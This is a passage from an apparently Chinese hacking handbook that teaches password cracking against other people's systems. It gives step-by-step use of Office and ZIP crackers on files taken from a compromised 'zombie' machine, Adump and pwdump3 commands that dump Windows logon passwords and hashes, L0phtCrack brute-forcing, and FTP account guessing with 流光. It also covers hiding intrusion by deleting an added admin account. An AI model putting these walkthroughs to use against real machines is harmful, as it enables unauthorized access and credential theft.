系统就会采用穷尽法对所有可能的密码组合进行测
试,找到密码后再将其显示出来,如图 2-3-10 所
示。
图2-3-10 Advanced Office XP Password Recovery破解结果显示
提示
图2-3-9 Advanced Office XP Password Recovery的运行主界面
这就是找到的密码
· 63 ·
这一系列不同软件的使用方法好像都差不多,遗憾的是这种软件如果不注册的话破解密码的最大长度
为 4 位。
除此之外,还有许多软件可以破解所有 Office 软件的密码,比如 Passware,它包含很多模块,除同时可
对 Office 系统中的 Word、Excel 和 Access 等软件进行破解外,还可对 Zip 文件等多种类型的加密文件进行破解。
Passware 使用很简单,如要破解 Office 的加密文件,只需选择相应模块 Office Key 运行即可,其运行界
面如图 2-3-11 所示。
2-3-11 Passware的Office Key模块运行主界面
只需将加密的 Office 文件拖到对话框或是按“Ctrl+O”组合键选择想要破解的加密文件,然后就可以静等
密码出现在对话框了。一般情况下,Passware 根据默认设置进行破解,如果想更改设置,可以按“Ctrl+T”组
合键调出设置对话框,然后根据自己的破解需要进行设置,如图 2-3-12 所示。
图2-3-12 Passware的设置对话框
2 . 3 . 6 破解 ZIP 密码
小博士,从肉机复制到本地的Office 加密文件倒是可以打开了,但是有些机密信息是压缩包形式,而且设置了
密码,又该如何打开呢?
同样可以采用专门破解压缩包密码的软件进行破解,下面就以 Winzip 为例来看看如何破解压缩文件密码。
· 64 ·
破解 Winzip 加密的文件很费时间,特别是又有
字母又有数字的密码,在没有字典的情况下破解一
个 6 个字符长的密码花两三个小时是常有的事情。
破解加密的 Z I P 文件的最好工具应该是
Vzprp5.4(Visual Zip Password Recovery
Processor5.4) ,破解速度相对较快。如果是纯数
字或纯字母破解速度会更快,其运行主界面如图
2-3-13 所示。
首先选择“Password options”选项卡,选
择密码所有可能的组成符号(字母、数字、特殊符
号) ,密码的最短长度和最长长度。其他的一些标
签选项都可以采用默认值。然后点击主菜单中的
“Open zip/exe”按钮
,选择想要破解的 ZIP
文件,最后点击“GO”按钮
,很快密码将出现,
如图 2-3-14 所示。
图2-3-14 Vzprp5.4的运行结果显示
没有注册的软件版本在破解密码时可能会遇到还没有出现破解结果就弹出要求注册的对话框而中断,并
且能破解的密码位数很有限。
Vzprp5.4 是一个 ZIP 压缩文件密码恢复软件,最大的特点是支持多处理器和网络运算。使用图形操作
界面,可自定最小与最大密码长度及数字、字母、符号来“查”密码,亦有中断密码查询及储存功能,下
次要恢复上次的查询时,只需将储存的文件读入即可继续上次的查询,亦提供多种不同暴力查询模式。
当然,也可以使用第 2.3.4 节介绍的 Passware 中的 Zip Key 模块对 Zip 压缩文件进行破解,具体使用
方法与破解 Office 加密文件相同。
图2-3-13 Vzprp5.4的运行主界面
提示
这就是找到的密码
· 65 ·
2 . 3 . 7 破解 W i ndow s 2 0 0 0 的登录密码
1. 本地破解
如果在别人的电脑上进行操作,可以用 Adump 工具轻松地把当前登录用户的密码给导出来,如图 2-3-15 所示。
图2-3-15 Adump的命令运行结果
Adump 是一个 Windows 2000/NT 的密码导出工具,命令格式有两种:
Adump – d:在屏幕上显示用户和密码信息。
Adump – f [filename] :将用户和密码信息写入一个文件,打开保存的文件,跟屏幕显示的内容一样。
运行 adump – d 命令,会在屏幕上显示如下信息:
The logon information is:
User Domain: [STREAM] ;STREAM 为主机名。
User Name: [lqzld];lqzld 为当前登录用户名。
User Password: [play2586];play2586 即是我们想要的登录密码。
如果当前用户只是一个普通用户,并非管理员用户,可能就得不到当前用户的密码,而是显示如下信息:
Unable to find winlogon or you are using NWGINA.DLL.
Unable to find the Password in memory.
2. 远程破解
除了在第 2.2.5 节中所讲的方法将对方的 SAM 文件拷贝到本地用 L0phtcrack 进行破解的
方法以外,还可以
使用 Pwdump 这个工具,将肉机的用户密码文件远程导出到一个本地文本文件里。 Pwdump 是一个用来抓取 NT、Windows 2000 用户密码文档的工具,用法如下: pwdump3 ip_address [filename] [username]
ip_address:远程主机的 ip 地址。
filename:保存密码档的文件名(如果不指定这个参数,其输出将显示在屏幕上) 。 username:是在远程主机上的用户名,如果不指定,就导出对方机器所有用户的密码。 如 pwdump3 10.0.14.21 password.txt,这样就可将 IP 地址为 10.0.14.21 的机器的用户密码导出到
password.txt 文件中。
在导出肉机用户密码之前,必须先与肉机建立 Admin 连接,否则无法获取肉机的密码。 导出的用户密码的格式如下所示:
Administrator:500:028329D30AE6B29638D11C5FBFBDF3BD:BFD477682860D815FF8002FC34646CA2:::
Guest:501:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12283678::: 提示
这就是导出的密码
· 66 ·
IUSR_NAV-IT:1001:028329D30AE6B29638D11C5FBFBDF3BD:BFD477682860D815FF8002FC34646CA2:::
IWAM_NAV-IT:1002:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12283678:::
TsInternetUser:1000:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12283678:::
这里导出的还不是真正可以输入的密码,而是经过加密的密码 hash,在得到这些之后还需要使用密码
破解工具(例如 L0phtCrack)来破解出真正的密码。
可能有的人会问,既然已经知道了有 ADMIN 权限的用户的密码(没有 ADMIN 权限,根本无法 DUMP 系统的密
码档) ,为什么还要 DUMP 系统的密码档?其实
原因很简单,黑客往往是利用系统的安全漏洞
在远程系统上添加了一个具有 ADMIN 权限的用
户(如 UNICODE 的漏洞) ,而这样做,很容易暴
露自己(如果管理员经常检查系统的话) ,这
时,黑客就会利用已添加的 ADMIN 用户,先将
所有的用户密码 DUMP 下来,放在本地 CRACK,
再把自己添加的用户删除,下次需要进入系统
的时候,就可以用他自己 CRACK 出来的合法用
户了,这样系统管理员就很难发现了。
有了密码 h a s h 文件,下面就可以使用
L0phtCrack 来破解了。从 File 菜单选择 New
Session 打开一个新的破解会话,然后从 Im-
port 菜单中选择 Import From Pwdumpfile.,
再选择从 pwdump 导出的密码文件,这时密码文
件中所包含的用户名就会显示在列表中,最后
从 Session 菜单中选择 Begin Audit 或是工具
栏的
按钮就可开始破解密码。如果密码很简
单,很快便会在列表中显示出来。如图 2-3-16
所示。
默认情况下 L0phtCrack 首先通过字典文件
来猜测已经打开的密码文件,如果不能得到密
码文件,未被破解出的部分便会在列表中以
“???????”的方式来显示,这种情况需要采用
暴力法破解密码。
选择 Session 菜单中的 Session options,
勾选 Brute Force Crack 下的 Enable 项,然后
在Character set 中选择密码可能包含的字符,
如图 2-3-17 所示。选择越复杂的字符,破解出
的可能性越大,但所花费的时间就越长,最后
再点击 Begin Audit 按钮
开始重新破解。这
是一个极为耗时的过程,不过,只要耐心等待,
大多数的密码都是可以破解出来的。
提示
图 2-3-16 使用 L0phtCrack破解密码 hash文件
图2-3-17 选择使用暴力破解法破解密码
· 67 ·
从图 2-3-16 可以看出,L0phtCrack 会将密码分成两部分来进行破解,即每七位为一密码段,前面七位
稍微复杂一些,破解要费一些力,所以在设置密码时一定要注意前面几位带特殊字符,如 1234#5678 就会比
12345678# 安全得多。
L0phtCrack 是 Win NT/2000 管理员常用的优秀工具,它可以检测用户是否使用了不安全的密码,但是
黑客把它作为最好,最快的 Windows NT/2000 密码破解工具,4.0 版本在 P300 机器上不到 48 小时可以破解 90%
的超级用户(Admin) 口令,有 18% 的机器密码不到 10 分钟就可以破解。
2 . 3 . 8 破解 F T P 站点的密码
如果想要利用某FTP 站点来存放电影或是软件以供朋友们共享,该如何得到拥有上传权限的用户名和密码呢?
其实,对 FTP 站点用户名密码的破解,同样可以采用扫描 Windows 2000 弱口令用户的方法来进行扫描。
当然,也可以采用小榕的流光软件来进行扫描。
启动流光软件,在“FTP 主机”点击鼠标右键选择“编辑 | 添加” ,然后添加想要利用的那个 FTP 地址,如
图 2-3-18 所示。
图2-3-18 流光中添加欲利用的FTP主机
然后在弹出的对话框添加欲利用的主机,如图 2-3-19 所示。
图 2-3-19 添加 FTP主机名
· 68 ·
FTP 主机名称添加好后,还需要添加用户列表,鼠标右击添加的 FTP 主机名,再选择“编辑 | 从列表中选择” ,
在弹出的对话框中选择可能的用户列表,添加后结果如图 2-3-20 所示,双击“显示所有项目”就会显示出选中
的用户列表中所包含的用户。
图2-3-20 添加FTP主机和用户列表后的结果显示
现在 FTP 地址和用户名列表都有了,由于是大量的用户,可以用流光自带的简单模式探测,这种探测方法,
对每个用户名只进行简单的一两个常用密码探测,可以迅速找到密码设置简单的用户。点击流光任务栏中的“探
测 | 简单模式探测” ,然后去溜达一圈回来,就可以看到用户名和密码已经成了 “盘中餐” 。
简单模式探测通常采用的简单密码为“用户名”或“123456” ,我们也可以自己设置。选择菜单中的“选项
| 简单模式设置” ,出现如图 2-3-21 所示的对话框,大家可以根据需要做一些选择设置,以便能迅速找到想要的
用户名和密码。
图2-3-21 简单模式设置
通过对上面密码破解方法的演练,大家可以体会到密码字典的选择有多么重要。